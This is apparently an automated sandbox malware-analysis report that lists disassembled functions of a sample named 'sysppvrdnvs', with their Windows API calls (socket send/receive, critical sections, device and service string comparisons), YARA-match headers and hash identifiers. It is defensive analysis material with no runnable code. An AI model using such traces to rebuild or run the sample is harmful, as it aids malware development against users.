                                                                                                                                      • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                    • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                    • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                    • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                    • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                    Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: device$deviceType
                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                    • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                    • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
                                                                                                                                    • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                    • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                    Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: service$serviceType
                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                    • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                    • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
                                                                                                                                    • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                    • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                    • Opcode ID: 94c249e045a06f1e2524c37c45e205f07dc7f45f180538b1808bcfe672da9775
                                                                                                                                    • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                    • Opcode Fuzzy Hash: 94c249e045a06f1e2524c37c45e205f07dc7f45f180538b1808bcfe672da9775
                                                                                                                                    • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                    Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: device$deviceType
                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                    • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                    • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                    • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                    • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                    Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: service$serviceType
                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                    • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                    • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                    • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                    • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                    Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                    • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                    • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                    Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                    • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                    • String ID: ?c@$\??\
                                                                                                                                    • API String ID: 1681518211-744975932
                                                                                                                                    • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                    • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                    • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                    • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3966618661-0
                                                                                                                                    • Opcode ID: fa77988927cb930059e1e0cbc8a5de5e4af0f9e1d52da1810f0081e508491bbd
                                                                                                                                    • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                    • Opcode Fuzzy Hash: fa77988927cb930059e1e0cbc8a5de5e4af0f9e1d52da1810f0081e508491bbd
                                                                                                                                    • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                    Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                    • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                    • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                    Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                      • Part of subcall function 0040AB60: RtlFreeHeap.NTDLL(02DE0000,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                                    • Opcode ID: d53d7859b80e41eb9fd1776689c76fead4092fa41b0b9c03735f9e49e291d2c8
                                                                                                                                    • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                    • Opcode Fuzzy Hash: d53d7859b80e41eb9fd1776689c76fead4092fa41b0b9c03735f9e49e291d2c8
                                                                                                                                    • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                    Function 0040DE90 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(02DE0634), ref: 0040DEA9
                                                                                                                                    • CloseHandle.KERNEL32(02DE0638), ref: 0040DED8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(02DE0634), ref: 0040DEE7
                                                                                                                                    • DeleteCriticalSection.KERNEL32(02DE0634), ref: 0040DEF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3102160386-0
                                                                                                                                    • Opcode ID: 7ff1f6a6c7f609a02f2b7f0cb8a20d989c1467e854c2ae30cad7fe774086fae1
                                                                                                                                    • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                    • Opcode Fuzzy Hash: 7ff1f6a6c7f609a02f2b7f0cb8a20d989c1467e854c2ae30cad7fe774086fae1
                                                                                                                                    • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                    • Opcode ID: 717484efd16090e76a5f6f50ec8c25be0b30b0b06e4d972f140238cc77205b64
                                                                                                                                    • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                    • Opcode Fuzzy Hash: 717484efd16090e76a5f6f50ec8c25be0b30b0b06e4d972f140238cc77205b64
